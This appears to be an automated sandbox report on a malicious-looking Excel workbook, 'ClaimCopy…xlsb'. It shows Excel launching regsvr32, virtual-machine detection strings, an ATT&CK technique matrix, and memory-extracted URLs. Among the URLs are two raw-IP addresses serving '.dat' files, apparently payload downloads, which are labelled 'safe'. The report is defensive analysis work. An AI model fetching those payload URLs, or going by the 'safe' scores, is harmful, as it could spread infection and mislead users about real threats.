    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: EXCEL.EXE, 00000001.00000003.562031127.000000000F53B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598428723.000000000F531000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.739106606.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734406099.000000000F532000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.563181967.000000000F53B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.750364994.000000000F53C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWss
    Source: EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\&
    Source: EXCEL.EXE, 00000001.00000003.563282189.000000000F59F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734459899.000000000F59F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.739164995.000000000F59F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598625011.000000000F59F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.750435117.000000000F59F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281316672.000000000F59F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000002.749247373.000000000D6F1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWhWT
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000001.00000002.747435620.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000001.00000002.747435620.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000001.00000002.747435620.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000001.00000002.747435620.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ClaimCopy-355714047-12022021.xlsb10%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://o365auditrealtimeingestion.manage.office.comBearer0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    http://schemas.open0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.comh0%Avira URL Cloudsafe
    https://api.cortana.ait0%Avira URL Cloudsafe
    http://45.142.211.62/823634401007.dat2vdom0%Avira URL Cloudsafe
    http://185.82.126.78/823634401007.datr0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer0%Avira URL Cloudsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://outlook.office.com2;0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://substrate.office.coml0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://substrate.office.comy0%Avira URL Cloudsafe
    https://api.onedrive.comMBI0%Avira URL Cloudsafe
    https://substrate.office.comc0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.0%Avira URL Cloudsafe
    https://management.azure.comw0%Avira URL Cloudsafe
    https://settings.outlook.com&0%Avira URL Cloudsafe
    https://substrate.office.comP0%URL Reputationsafe
    https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
    https://substrate.office.com$;0%Avira URL Cloudsafe
    http://45.142.211.62/823634401007.dat20%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://onedrive.live.comed0%Avira URL Cloudsafe
    https://webshell.suite.office.comu0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://login.windows.net/common/oauth2/authorizeoOzlEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
      		high
      https://shell.suite.office.com:1443EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
        		high
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrvEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
          		high
          https://autodiscover-s.outlook.com/EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.733824840.0000000012FAE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281291219.000000000F564000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
            		high
            https://o365auditrealtimeingestion.manage.office.comBearerEXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
              		high
              https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oauEXCEL.EXE, 00000001.00000003.281285341.00000000130A5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                		high
                https://cdn.entity.1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                • URL Reputation: safe
                		unknown
                https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorizeEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                    		high
                    https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                      		high
                      https://login.windows.net/common/oauth2/authorizeDE#jEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                        		high
                        https://onedrive.live.com/embed?/EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.openEXCEL.EXE, 00000001.00000003.596899299.0000000015B4A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.597271004.0000000015B10000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.596937498.0000000015B7A000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                            		high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                              		high
                              https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/emEXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpfalse
                                		high
                                https://login.windows-ppe.net/common/oauth2/authorize(EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                  		high
                                  https://api.aadrm.com/EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281589453.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://graph.windows.net/_9YEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                    		high
                                    https://login.windows.net/common/oauth2/authorizeKAVn?EXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                      		high
                                      https://login.windows.net/common/oauth2/authorizeICThaEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                        		high
                                        https://clients.config.office.net/ListEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                          		high
                                          https://api.aadrm.comhEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.cortana.aitEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                            		high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000001.00000002.751400177.0000000012EC0000.00000004.00000001.sdmpfalse
                                              		high
                                              http://45.142.211.62/823634401007.dat2vdomEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://api.microsoftstream.com/api/EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                		high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                  		high
                                                  https://cr.office.comEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                    		high
                                                    http://185.82.126.78/823634401007.datrEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://login.windows.net/common/oauth2/authorize9B$iQEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://login.windows.net/common/oauth2/authorize~OmlEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000001.00000003.281278632.00000000130AB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000001.00000003.281133390.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281266817.00000000130B7000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://tasks.office.comEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281017203.0000000012F8B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmp, 1C879995-8362-47D0-A5BB-F2EF376F1B92.1.drfalse
                                                            		high
                                                            https://login.windows.net/common/oauth2/authorizejByiNEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://api.addins.omex.office.net/appinfo/query=N(mEXCEL.EXE, 00000001.00000003.734048144.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.598123614.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.734991130.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.281163989.00000000130E8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.285622692.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.560788161.00000000130A4000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.751938211.00000000130A4000.00000004.00000001.sdmpfalse
                                                                		high
